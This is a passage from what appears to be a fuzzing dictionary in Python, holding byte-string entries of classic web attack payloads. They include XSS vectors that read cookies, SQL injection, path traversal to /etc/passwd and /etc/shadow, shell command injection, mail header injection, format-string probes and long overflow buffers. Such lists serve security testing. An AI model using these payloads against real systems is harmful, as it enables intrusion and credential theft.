Value(b'<IMG SRC=javascript:alert&#'
b'x28'XSS')>', 1000),
Value(b"<IMG SRC=JaVaScRiPt:alert('XSS')>", 264),
Value(b'<IMG SRC=`javascript:alert("\'XSS\'")`>', 296),
Value(b'<IMG SRC=javascript:alert("XSS")>', 344),
Value(b"<IMG SRC=javascript:alert('XSS')>", 264),
Value(b'<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', 456),
Value(b"<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>", 688),
Value(b"<IMG%20SRC='javasc\tript:alert(document.cookie)'>", 384),
Value(b"<IMG%20SRC='javascript:alert(document.cookie)'>", 376), Value(b'<foo></foo>', 88),
Value(b"<name>','')); phpinfo(); exit;/*</name>", 312),
Value(b'<script>alert("XSS")</script>', 232),
Value(b'<script>alert(document.cookie)</script>', 312),
Value(b'<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></xml>'
b'<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml>'
b'<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', 1672),
Value(b'<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]>', 608),
Value(b'<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', 688),
Value(b"<xss><script>alert('XSS')</script></vulnerable>", 376),
Value(b'<youremail>%0aBcc:<youremail>', 232), Value(b'<youremail>%0aCc:<youremail>', 224),
Value(b'<youremail>%0d%0aBcc:<youremail>', 256), Value(b'<youremail>%0d%0aCc:<youremail>', 248),
Value(b'=', 8), Value(b"='", 16), Value(b'=--', 24), Value(b'=;', 16), Value(b'>', 8),
Value(b'?x=', 24), Value(b'?x="', 32), Value(b'?x=>', 32), Value(b'?x=|', 32),
Value(b'@'', 56), Value(b"@'", 16), Value(b'@*', 16), Value(b'@variable', 72), Value(b'A', 8),
Value(b'ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|', 520),
Value(b'FALSE', 40), Value(b'NULL', 32), Value(b'PRINT', 40), Value(b'PRINT @@variable', 128),
Value(b'TRUE', 32), Value(b'XXXXX.%p', 64), Value(b'XXXXX`perl -e \'print ".%p" x 80\'`', 264),
Value(b'[']', 64), Value(b"[']", 24), Value(b'\\', 8), Value(b'\\";alert(\'XSS\');//', 144),
Value(b'\\"blah', 48), Value(b'\\'', 56), Value(b"\\'", 16),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd', 328),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00', 352),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow', 328),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00', 352), Value(b'\\0', 16),
Value(b'\\00', 24), Value(b'\\00\\00', 48), Value(b'\\00\\00\\00', 72), Value(b'\\0\\0', 32),
Value(b'\\0\\0\\0', 48), Value(b'\\\\', 16),
Value(b'\\\\'/bin/cat%20/etc/passwd\\\\'', 304),
Value(b'\\\\'/bin/cat%20/etc/shadow\\\\'', 304), Value(b'\\\\/', 24),
Value(b'\\\\\\\\*', 40), Value(b'\\\\\\\\?\\\\', 56), Value(b'\\n/bin/ls -al\\n', 120),
Value(b'\\n/usr/bin/id;', 112), Value(b'\\n/usr/bin/id\\n', 120), Value(b'\\n/usr/bin/id|', 112),
Value(b'\\nid;', 40), Value(b'\\nid\\n', 48), Value(b'\\nid|', 40),
Value(b'\\nnetstat -a%\\n', 120), Value(b'\\t', 16), Value(b'\\u003C', 48), Value(b'\\u003c', 48),
Value(b'\\x23', 32), Value(b'\\x27', 32), Value(b'\\x27UNION SELECT', 128),
Value(b'\\x27\\x4F\\x52 SELECT *', 168), Value(b'\\x27\\x6F\\x72 SELECT *', 168),
Value(b'\\x3C', 32), Value(b'\\x3D \\x27', 72), Value(b"\\x3D \\x3B'", 80), Value(b'\\x3c', 32),
Value(b'^'', 56), Value(b"^'", 16), Value(b'`', 8), Value(b'`/usr/bin/id`', 104),
Value(b'`dir`', 40), Value(b'`id`', 32), Value(b'`perl -e \'print ".%p" x 80\'`%n', 240),
Value(b'`ping 127.0.0.1`', 128), Value(b'a);/usr/bin/id', 112), Value(b'a);/usr/bin/id;', 120),
Value(b'a);/usr/bin/id|', 120), Value(b'a);id', 40), Value(b'a);id;', 48), Value(b'a);id|', 48),
Value(b'a)|/usr/bin/id', 112), Value(b'a)|/usr/bin/id;', 120), Value(b'a)|id', 40),
Value(b'a)|id;', 48), Value(b'a;/usr/bin/id', 104), Value(b'a;/usr/bin/id;', 112),
Value(b'a;/usr/bin/id|', 112), Value(b'a;id', 32), Value(b'a;id;', 40), Value(b'a;id|', 40),
Value(b'http://<yourservername>/', 192), Value(b'id%00', 40), Value(b'id%00|', 48),
Value(b'insert', 48), Value(b'like', 32), Value(b'limit', 40), Value(b'null', 32), Value(b'or', 16),
Value(b'or 0=0 #', 64), Value(b'or 0=0 --', 72), Value(b'or 1=1--', 64), Value(b'or%201=1', 64),
Value(b'or%201=1 --', 88), Value(b'response.write 111111', 168), Value(b'something%00html', 128),
Value(b'update', 48), Value(b"x' or 1=1 or 'x'='y", 152),
Value(b"x' or name()='username' or 'x'='y", 264), Value(b'xsstest', 56),
Value(b'xsstest%00"<>\'', 112), Value(b'{'}', 64), Value(b'|/usr/bin/id', 96),
Value(b'|/usr/bin/id|', 104), Value(b'|id', 24), Value(b'|id;', 32), Value(b'|id|', 32),
Value(b'|ls', 24), Value(b'|ls -la', 56), Value(b'|nid\\n', 48), Value(b'|usr/bin/id\\n', 104),
Value(b'||', 16), Value(b'|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &', 424),
Value(b'||/usr/bin/id;', 112), Value(b'||/usr/bin/id|', 112), Value(b'}', 8),
Value(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
80000),
Value(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
